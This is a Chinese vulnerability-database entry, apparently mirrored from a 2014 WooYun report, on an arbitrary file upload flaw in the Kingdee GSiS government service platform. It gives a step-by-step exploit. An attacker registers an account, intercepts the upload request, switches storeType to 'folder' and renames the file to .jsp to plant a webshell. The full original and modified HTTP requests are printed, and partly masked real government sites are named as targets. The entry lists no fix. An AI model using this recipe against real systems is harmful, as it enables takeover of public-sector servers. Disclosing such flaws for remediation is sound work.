金蝶政务GSiS服务平台通用上传漏洞

基本字段

漏洞编号：: SSV-93759

披露/发现时间：: 2014-07-22

提交时间：: 2014-07-22

漏洞等级：

漏洞类别：: 其他类型

影响组件：: Kingdee

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-069300

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： GSiS政务服务平台：首个完全根据国家政策要求全新开发的，支撑政务服务体系和行政权力监督体系融合运转的一体化平台。测试中发现存在任意文件上传漏洞，可获取webshell ### 详细说明：问题：上传页面多数参数可控，导致任意文件上传,且有越权访问会员外功能问题。收集到的案例有：高平市政务中心 http://gk.sx******.gov.cn:8080/kdgs/ 汉川政务中心 http://www.han****.gov.cn:8080/kdgs 等等通杀所有金蝶GSIS ### 漏洞证明：本次演示地址为： http://gk.sx******.gov.cn:8080/kdgs 漏洞地址：http://gk.sx******.gov.cn:8080/kdgs/portal/sharehttps://images.seebug.org/upload/uploadFile.jsp 第一步：注册并登录网站会员获取合法会话标识注册地址 http://gk.sx******.gov.cn:8080/kdgs/biz/portal/user/regist.action?registUserType= 如果页面找不到注册按钮的可以直接替换页面找到注册地址。第二步：访问文件上传页面，利用burpsuite代理进行上传正常上传POST请求为 ``` POST /kdgs/biz/portalhttps://images.seebug.org/upload/upload.action HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/sharehttps://images.seebug.org/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640 Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Content-Type: multipart/form-data; boundary=---------------------------7def0302c2 Accept-Encoding: gzip, deflate Host: gk.sx******.gov.cn:8080 Content-Length: 1502 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER -----------------------------7def0302c2 Content-Disposition: form-data; name="id" -----------------------------7def0302c2 Content-Disposition: form-data; name="viewid" -----------------------------7def0302c2 Content-Disposition: form-data; name="path" ITEM_PATH -----------------------------7def0302c2 Content-Disposition: form-data; name="fileSaveMode" 00 -----------------------------7def0302c2 Content-Disposition: form-data; name="uploadList_" -----------------------------7def0302c2 Content-Disposition: form-data; name="fieldValue" -----------------------------7def0302c2 Content-Disposition: form-data; name="allowedTypes" -----------------------------7def0302c2 Content-Disposition: form-data; name="maximumSize" 3145728 -----------------------------7def0302c2 Content-Disposition: form-data; name="storeType" db -----------------------------7def0302c2 Content-Disposition: form-data; name="fieldid" -----------------------------7def0302c2 Content-Disposition: form-data; name="file"; filename="3.gif" Content-Type: image/gif wooyun -----------------------------7def0302c2 Content-Disposition: form-data; name="filename" C:\fakepath\3.gif -----------------------------7def0302c2 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream -----------------------------7def0302c2 Content-Disposition: form-data; name="filename" -----------------------------7def0302c2-- ``` 修改storeType的值db为folder 修改filename的值为XX.jsp [<img src="https://images.seebug.org/upload/201407/22140035beec481016818ab1e639d16428a9a06d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/22140035beec481016818ab1e639d16428a9a06d.png) 修改后的POST数据包为 ``` POST /kdgs/biz/portalhttps://images.seebug.org/upload/upload.action HTTP/1.1 Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */* Referer: http://gk.sx******.gov.cn:8080/kdgs/portal/sharehttps://images.seebug.org/upload/uploadFile.jsp?path=ITEM_PATH&maximumSize=3145728&fileSaveMode=00&storeType=db&refreshTimestamp=1405994496640 Accept-Language: zh-cn User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) Content-Type: multipart/form-data; boundary=---------------------------7def0302c2 Accept-Encoding: gzip, deflate Host: gk.sx******.gov.cn:8080 Content-Length: 1502 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: JSESSIONID=B247935EBA2FB9FE9B4C4506A4646D45; __userType__cookie=INNER -----------------------------7def0302c2 Content-Disposition: form-data; name="id" -----------------------------7def0302c2 Content-Disposition: form-data; name="viewid" -----------------------------7def0302c2 Content-Disposition: form-data; name="path" ITEM_PATH -----------------------------7def0302c2 Content-Disposition: form-data; name="fileSaveMode" 00 -----------------------------7def0302c2 Content-Disposition: form-data; name="uploadList_" -----------------------------7def0302c2 Content-Disposition: form-data; name="fieldValue" -----------------------------7def0302c2 Content-Disposition: form-data; name="allowedTypes" -----------------------------7def0302c2 Content-Disposition: form-data; name="maximumSize" 3145728 -----------------------------7def0302c2 Content-Disposition: form-data; name="storeType" folder -----------------------------7def0302c2 Content-Disposition: form-data; name="fieldid" -----------------------------7def0302c2 Content-Disposition: form-data; name="file"; filename="3.gif" Content-Type: image/gif wooyun -----------------------------7def0302c2 Content-Disposition: form-data; name="filename" C:\fakepath\3.jsp -----------------------------7def0302c2 Content-Disposition: form-data; name="file"; filename="" Content-Type: application/octet-stream -----------------------------7def0302c2 Content-Disposition: form-data; name="filename" -----------------------------7def0302c2-- ``` 上传成功后得到 [<img src="https://images.seebug.org/upload/201407/29122606fa695654021ef605bd04434ee768bfd2.png" alt="2214090909734adf55858a24ca2745e921f09f4c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/29122606fa695654021ef605bd04434ee768bfd2.png) webshell地址为 http://gk.sx******.gov.cn:8080/kdgs/uploads/item/11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp 11e4-1165-d78d7b5a-ba69-331a1d69f888.jsp是随机的，看burpsuite回显。 [<img src="https://images.seebug.org/upload/201407/29122621bd3b91cd6c26761478babf746f817ed7.png" alt="22141009dd5c045a79425a4decd5bb2b0eeedd89.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/29122621bd3b91cd6c26761478babf746f817ed7.png)

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-069300

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

金蝶政务GSiS服务平台通用上传漏洞

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定